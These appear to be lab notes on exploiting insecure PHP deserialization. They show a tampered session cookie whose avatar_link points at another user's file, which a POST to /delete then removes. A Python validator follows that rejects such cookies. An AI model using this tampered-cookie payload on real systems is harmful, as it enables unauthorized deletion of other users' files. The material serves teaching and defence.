3 - Using application functionality to exploit insecure deserialization

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"gr1tvt24g7lxaa9o99ch3h6db2qwd5ks";s:11:"avatar_link";s:19:"users/wiener/avatar";}

We simply send a POST to /delete, replacing the cookie with:

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"gr1tvt24g7lxaa9o99ch3h6db2qwd5ks";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
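
A server-side check for the tampering shown above, as an added example that is not part of the original notes: it strictly parses the cookie, rejecting wrong length prefixes, and refuses any avatar_link outside the user's own directory. Assumptions: /delete removes the file named by avatar_link, avatars live under users/<username>/, and session_user comes from server-side session state rather than from the cookie; parse_user and avatar_path_allowed are hypothetical names.

```python
import posixpath
import re

# Constructed samples: the page's two cookie values, each with a correct byte length.
ORIGINAL = ('O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:'
            '"gr1tvt24g7lxaa9o99ch3h6db2qwd5ks";s:11:"avatar_link";s:19:"users/wiener/avatar";}')
TAMPERED = ('O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:'
            '"gr1tvt24g7lxaa9o99ch3h6db2qwd5ks";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}')

HEADER = re.compile(rb'O:4:"User":(\d+):\{')
STRING = re.compile(rb's:(\d+):"')


class CookieError(ValueError):
    """Raised when the cookie is not a well-formed, strings-only User object."""


def parse_user(cookie: str) -> dict:
    """Strictly parse a flat PHP-serialized User object (string properties only)."""
    data = cookie.encode()
    head = HEADER.match(data)
    if not head:
        raise CookieError("not a User object")
    pos, fields = head.end(), []
    for _ in range(2 * int(head.group(1))):  # each property = key string + value string
        m = STRING.match(data, pos)
        if not m:
            raise CookieError("only string fields are accepted")
        start, n = m.end(), int(m.group(1))  # PHP lengths count bytes
        if data[start + n:start + n + 2] != b'";':
            raise CookieError("length prefix does not match value")
        fields.append(data[start:start + n].decode())
        pos = start + n + 2
    if data[pos:] != b"}":
        raise CookieError("unexpected trailing data")
    return dict(zip(fields[0::2], fields[1::2]))


def avatar_path_allowed(user: dict, session_user: str) -> bool:
    """True only if avatar_link normalizes to a path inside users/<session_user>/."""
    link = user.get("avatar_link", "")
    if user.get("username") != session_user or link.startswith("/") or "\0" in link:
        return False
    # Lexical check only; the code that deletes the file should also resolve symlinks.
    return posixpath.normpath(link).startswith(f"users/{session_user}/")


if __name__ == "__main__":
    for label, cookie in (("original", ORIGINAL), ("tampered", TAMPERED)):
        print(label, avatar_path_allowed(parse_user(cookie), "wiener"))
```

The path check limits what a modified cookie can reach; the cookie stays client-controlled unless the server also signs it or keeps the object in server-side session state.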